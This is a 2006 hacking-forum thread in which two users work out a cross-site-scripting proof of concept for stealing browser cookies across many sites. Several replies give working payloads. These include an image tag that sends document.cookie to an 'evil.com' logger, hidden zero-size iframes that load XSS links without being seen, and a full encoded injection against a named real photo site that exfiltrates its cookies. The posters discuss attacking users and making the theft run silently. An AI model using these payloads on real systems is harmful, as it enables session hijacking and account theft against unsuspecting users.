Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
If you have some interesting news or want to throw up a link to discuss it, here's the place. Anything is okay, even shameless vendor launches (since that is often applicable to what we work on). 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
X(C)SS Cross browser Exploit p0c
Posted by: jungsonn
Date: December 12, 2006 02:58AM

Based on the Idea by Jeremiah Grossman (with that excellent css find)
and ofcorse maluc who gave me the multiple XSS idea to work this X(C)SS thingy out he suggested.

X(C)SS Cross browser Exploit p0c
http://www.jungsonnstudios.com/cool.php

I've tested it on FireFox and MSIE,
in both versions it works on 2 platforms.

Note:
it should not work with all those crazy extensions you guys have installed :)
but a 'normal' surfer doesn't have it, so it has a pretty good chance. *_*

Love to hear your ideas/comments on it, and even suggestions for on my watch! ;)



Edited 1 time(s). Last edit at 12/12/2006 02:22PM by jungsonn.

Options: ReplyQuote
Re: X(C)SS Cross browser Exploit p0c
Posted by: maluc
Date: December 12, 2006 05:10AM

i don't think the xmlhttpreq part will work quite like you'd hope - but you're on the right track. Somewhere you're going to have to use iframes for each of the XSS links. and each of those iframes are going to have to include an image back to a logger:

'<img src="http://evil.com/cookie_monster.php?id=UNIQUE_ID&site='+location.host+'&cookie='+document.cookie+'">'

That unfortunately, means we need a logger to handle 800 connections for each user we attack. Then your main exploit can ping 'http://evil.com/is_it_done.php?id=UNIQUE_ID&dontcache='+Math.random(); .. once a second until it returns a "Yes. they are: blah". Assuming the main exploit is also run from evil.com

And actually, i've thought of a completely headless way using javascript redirects, which i'll go ahead an make a PoC for. It's indeed limited by the 2-requests at a time queue, but if we put all the variables after the hash (#) .. caching should make it really fast. Again, it needs iframes, not XHR

Edit: but if you can think of a way using XHR, i'm interested to see that working, or the code that cookie_monster.php would use..

-maluc



Edited 1 time(s). Last edit at 12/12/2006 05:12AM by maluc.

Options: ReplyQuote
Re: X(C)SS Cross browser Exploit p0c
Posted by: jungsonn
Date: December 12, 2006 06:24AM

Yes, i did not fully test it. I also thought of iframes, on each found site i generate a little 1px iframe. But didn't have the time to put it in yet.
Also with the xmlhttprequest, i also though about implementing a timeout or a simple sleep. I'm not sure yet. The image idea is nice, it also faster then XHR.
I'm going to make a real world example, otherwise it's just a piece of code :)
Thanx Maluc!

Options: ReplyQuote
Re: X(C)SS Cross browser Exploit p0c
Posted by: maluc
Date: December 12, 2006 06:35AM

rather than make them 1pixel .. make them not up no space with "position: abolute" and invisible with "visiblity: hidden" .. although i usually make their height/width zero for good measure. Except when using the quicktime XSS in IE (it wont execute if the window is zero for some reason)

so: <iframe src="xsslink" style="height: 0; width: 0; position: absolute; visibility: hidden"><iframe>

even 800 of those should not affect the layout more than one <br />

Important though, use createElement('iframe') if you want it useable in IE7. it seems to freak out if you dynamically generate a bunch of iframes with innerHTML, as i posted here: http://sla.ckers.org/forum/read.php?3,2382,2382#msg-2382

Sadly, no one was interested.. but atleast the info comes in handy now ^^

-maluc

Options: ReplyQuote
Re: X(C)SS Cross browser Exploit p0c
Posted by: jungsonn
Date: December 12, 2006 07:20AM

I've got an example up with the image idea, not sure though. A little tired by now. If you notice something wrong, pls lemme know.

*_*

Options: ReplyQuote
Re: X(C)SS Cross browser Exploit p0c
Posted by: jungsonn
Date: December 12, 2006 07:26AM

Oh and:

Now find a way to get rid of the alert XSS thingy,
cause it want to grab the cookie it without an alert ofcorse :)

Options: ReplyQuote
Re: X(C)SS Cross browser Exploit p0c
Posted by: maluc
Date: December 12, 2006 09:03AM

heh, by davinci-ish i meant.. intentionally putting in errors into your work, to prevent novices from stealing your work. Leonardo Da Vinci did it a lot in his designs, so they couldn't be stolen and built from them. Like the tank he designed with the wheels rolling against each other - so it would never move.

And i don't think your sndReq() half will work as described. first off, each one will need it's own requestion object. Second off, pages you get with XMLHTTP aren't executed, you only download the source. So where is the user visiting the xss link and sending the cookies?

By adding the image link i meant for example:

This XSS:
htp://www.bigstockphoto.com/search.php?photo_name=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E

We put this into our exploit code:
<script>
exploit = '"><script defer>document.body.innerHTML = "<img src=%27http:\/\/evil.com/stealer.php'
          + '?site=bigstockphoto%26cookie=" %2B document.cookie %2B "%27>"<\/script>';
document.body.innerHTML += "<iframe src='http://www.bigstockphoto.com/search.php?photo_name=" + exploit + "'></iframe>"
</script>

So when http://www.bigstockphoto.com/search.php?photo_name=%22%3E%3Cscript%20defer%3Edocument.body.innerHTML%20=%20%22%3Cimg%20src=%27http://evil.com/stealer.php?site=bigstockphoto%26cookie=%22%20%2B%20document.cookie%20%2B%20%22%27%3E%22%3C/script%3E is loaded in that iframe on our exploit page, it opens an image to the cookie stealer, with the cookies of that page (bigstockphoto.com). It uses an iframe, you can't really implement it with XMLHTTP..

-maluc

Options: ReplyQuote
Re: X(C)SS Cross browser Exploit p0c
Posted by: jungsonn
Date: December 12, 2006 02:16PM

Thankx Maluc! solved alot of time for me, and the headaches. I've updated the script a little towards your approach.

Maluc said: "So where is the user visiting the xss link and sending the cookies?"

Yes, the XHR was only an example, i've woud have used iframe or hidden layers to accomplish a good result. Forgive me 4 that, was 2 tired to put one up :)

Still, i'm going to figure it out todo it with the XHR silently,
it must be possible.

Options: ReplyQuote


Sorry, only registered users may post in this forum.